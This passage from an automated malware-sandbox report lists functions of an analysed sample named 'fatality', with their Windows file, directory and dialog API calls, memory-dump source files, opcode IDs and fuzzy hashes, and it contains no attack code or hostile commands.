                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2011010700-0
                                                                    • Opcode ID: 8da87d2a5b6a0296baf5291bab5df52016ba15fa79b1cec8636095735565bf61
                                                                    • Instruction ID: 6ce2c615ce5a361a8785fda5b6dcde9c0b4c904e39f5f53c4d5b12e5c8db22f4
                                                                    • Opcode Fuzzy Hash: 8da87d2a5b6a0296baf5291bab5df52016ba15fa79b1cec8636095735565bf61
                                                                    • Instruction Fuzzy Hash: 8301D831200296AAEF21BBBB4C09BFD3388DF0A780F088415F941E6092D754EA81C6B6
                                                                    Function 00DFF4E7 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___security_init_cookie.LIBCMT ref: 00DFF530
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ___security_init_cookie
                                                                    • String ID:
                                                                    • API String ID: 3657697845-0
                                                                    • Opcode ID: f2e0224e0e726d32e4aa3d82ddd5216a9d94b50dd166366a6b3fe3b62ed2f5eb
                                                                    • Instruction ID: 0ce49f79701ee1246663aa46a8db197c498127c85b03406d7db756cf3a3e93b4
                                                                    • Opcode Fuzzy Hash: f2e0224e0e726d32e4aa3d82ddd5216a9d94b50dd166366a6b3fe3b62ed2f5eb
                                                                    • Instruction Fuzzy Hash: FD01253164438E9EDF24AFA4D8027FD77A0DF01325F2581B9E7407B6D2CA2059458774
                                                                    Function 00DE9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: afd14b9ba989ed73e49feb366239955cc36b5f9cf70e5bda64fa928fd91c1049
                                                                    • Instruction ID: ceb720864ddfecfcd29edb0dfd43979fc940db7a6481b606612ba8f5cfafc716
                                                                    • Opcode Fuzzy Hash: afd14b9ba989ed73e49feb366239955cc36b5f9cf70e5bda64fa928fd91c1049
                                                                    • Instruction Fuzzy Hash: 2201A5339015A8ABCF11BBA9CC919DEB736FF88750F054115F916B7112DA348D00C6B4
                                                                    Function 00E08E54 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 05415af416a40baccb396580cfde6191489eb57f717e2a4dc840883a44b4b73e
                                                                    • Instruction ID: 5c41b1cd256322ddc279dbdb5150f64593a82922160e34673eab906836d0d8aa
                                                                    • Opcode Fuzzy Hash: 05415af416a40baccb396580cfde6191489eb57f717e2a4dc840883a44b4b73e
                                                                    • Instruction Fuzzy Hash: 6AF0FC32601102AADB212A25DE04BAF37A88F91770F256115F9D8761D1DF70DDC281A0
                                                                    Function 00DE5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE5AC2
                                                                      • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: dfc02d8a5c8e1177de8128a8d8358b6174f6b3ce4380f8427df02985e4b5a253
                                                                    • Instruction ID: 5a5f062105d06cdaf01621ce87344e1e494808b9b7ec4613cc1e6752ee43df43
                                                                    • Opcode Fuzzy Hash: dfc02d8a5c8e1177de8128a8d8358b6174f6b3ce4380f8427df02985e4b5a253
                                                                    • Instruction Fuzzy Hash: 6C018C308106D8DAD725E7B8C0517EDFBA8DF64304F51848EA55AA3383CBB42B08D7B2
                                                                    Function 00DEA4ED Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,00DEA325,00000001,00DE70E6,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA501
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2048169685-0
                                                                    • Opcode ID: 826c3b04781a4d6e4af2c412a36a9df615b08f018a0e1fdee81b4f63bc144d40
                                                                    • Instruction ID: 93600c41054fa88431c137e0faf32f581a925e4038ac079edf7d24e7da742903
                                                                    • Opcode Fuzzy Hash: 826c3b04781a4d6e4af2c412a36a9df615b08f018a0e1fdee81b4f63bc144d40
                                                                    • Instruction Fuzzy Hash: 3CF0E53120024ABBDF026F61DC01FDA3BACAF08385F488451B944E5160DB31DBD8DB70
                                                                    Function 00DEA1E0 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,00DE977F,?,?,00DE95CF,00000000,00E12641,000000FF), ref: 00DEA1F1
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3339486230-0
                                                                    • Opcode ID: b2d56ddf0269e8ed028ac0f923f8be59568cf4d4521a5c5da563be8329cdba76
                                                                    • Instruction ID: c12ffe9f102fa70f5992f4ae4746c5e6bc93bf006ad487e90589b97edc372ffa
                                                                    • Opcode Fuzzy Hash: b2d56ddf0269e8ed028ac0f923f8be59568cf4d4521a5c5da563be8329cdba76
                                                                    • Instruction Fuzzy Hash: 09E092311402496BDB116F66DC45FEA379CAB0C381F488021BA44E2060EB61EE88DA74
                                                                    Function 00DEA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                      • Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Find$FileFirst$Close
                                                                    • String ID:
                                                                    • API String ID: 2810966245-0
                                                                    • Opcode ID: b352a4ae98fb25031dec87e8cd840f0b3ee83e6d135f718525b1c99eda66b682
                                                                    • Instruction ID: e2d3bbfbf0c0e3b1eefee61210e4fca51763ddd2a9a182a2933e8e329751e1a9
                                                                    • Opcode Fuzzy Hash: b352a4ae98fb25031dec87e8cd840f0b3ee83e6d135f718525b1c99eda66b682
                                                                    • Instruction Fuzzy Hash: AAF082310087D1AACB227BB98904BCB7BD0AF1A331F158A4DF1FD62196C27560989B33
                                                                    Function 00DFA626 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • 73516BB0.GDIPLUS(00000010), ref: 00DFA62C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: 73516
                                                                    • String ID:
                                                                    • API String ID: 486175124-0
                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                    • Instruction ID: 13b3177c5e697f0051426fe81149653ffccb00dc5a5ca993e46ae22f45ad1817
                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                    • Instruction Fuzzy Hash: 24D0C7B521060DB6DF416B658C12A7E7A95EB40340F05C125BE49D5151EAB1DA109572
                                                                    Function 00DFDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00DFDD92
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                    • String ID:
                                                                    • API String ID: 897784432-0
                                                                    • Opcode ID: cf6a3a9134a8bcf90d7334536308437d964f5c10095ecada5c01889bb0011012
                                                                    • Instruction ID: 15ad23f29b84bea8221dec06d691a658e336c2612f927852867edd2b286b7b45
                                                                    • Opcode Fuzzy Hash: cf6a3a9134a8bcf90d7334536308437d964f5c10095ecada5c01889bb0011012
                                                                    • Instruction Fuzzy Hash: 9AD09E31144300BFD6112B52CE06F1A7AA2EB98B04F004555B384740B2C6729D21DB25
                                                                    Function 00DE98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileType.KERNELBASE(?,00DE97BE), ref: 00DE98C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID:
                                                                    • API String ID: 3081899298-0
                                                                    • Opcode ID: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
                                                                    • Instruction ID: 23cc47e37982469721e39b2342948891bb3dc47cad441b19c6c22b7f77554f3b
                                                                    • Opcode Fuzzy Hash: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
                                                                    • Instruction Fuzzy Hash: ECC01234401145898E206A3698940D9F311AB933657B88795C028850B1C322CC47EA21
                                                                    Function 00DE9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetEndOfFile.KERNELBASE(?,00DE903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 00DE9F0C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: File
                                                                    • String ID:
                                                                    • API String ID: 749574446-0
                                                                    • Opcode ID: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
                                                                    • Instruction ID: de1930adfd99225f28710ac2f2e1c1e6c3678d9d5d200c011f633b7e728d86cb
                                                                    • Opcode Fuzzy Hash: 0ef8895537ee1edae5f9d0e9e887784963aa45ad3e09c857f6007c8b89ecbc32
                                                                    • Instruction Fuzzy Hash: 55A0113008000A8A8E002B32CA0808C3B20EB20BC030082A8A00ACA0A2CB22880B8A00
                                                                    Function 00DFAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 00DFAC08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID:
                                                                    • API String ID: 1611563598-0
                                                                    • Opcode ID: 1073ee188ca76be23d2e561b6bf71bf7c7c4cdf2338071565a26c5c2c72e0ad5
